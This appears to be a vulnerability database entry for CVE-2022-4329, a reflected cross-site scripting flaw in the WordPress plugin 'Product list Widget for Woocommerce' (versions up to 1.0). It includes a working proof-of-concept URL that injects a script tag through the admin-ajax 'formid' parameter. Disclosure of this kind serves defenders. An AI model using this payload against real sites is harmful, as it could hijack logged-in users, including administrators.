Lucene search
CydaveWPEX-ID:D7F2C1C1-75B7-4AEC-8574-F38D506D064AHistoryDec 08, 2022 - 12:00 a.m.
Product list Widget for Woocommerce <= 1.0 - Reflected XSS
2022-12-0800:00:00
cydave
143
woocommerce reflectedxss securityvulnerability ajaxexploit unauthenticatedusers authenticatedusers
0.001 Low
EPSS
Percentile
43.1%
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high privilege one like admin).
Make any unauthenticated or authenticated users (such as a logged-in admin) open the following URL:
https://example.com/wp-admin/admin-ajax.php?action=gmwqp_change_cat&option=taxonomy&formid="></select><script>alert(`xss`)</script>Related
cvelist
cvelist
CVE-2022-4329 Product list Widget for Woocommerce <= 1.0 - Reflected XSS
2023-01-02 21:49:38
prion
prion
Cross site scripting
2023-01-02 22:15:00
cve
cve
CVE-2022-4329
2023-01-02 22:15:17
wpvulndb
wpvulndb
Product list Widget for Woocommerce <= 1.0 - Reflected XSS
2022-12-08 00:00:00
nvd
nvd
CVE-2022-4329
2023-01-02 22:15:17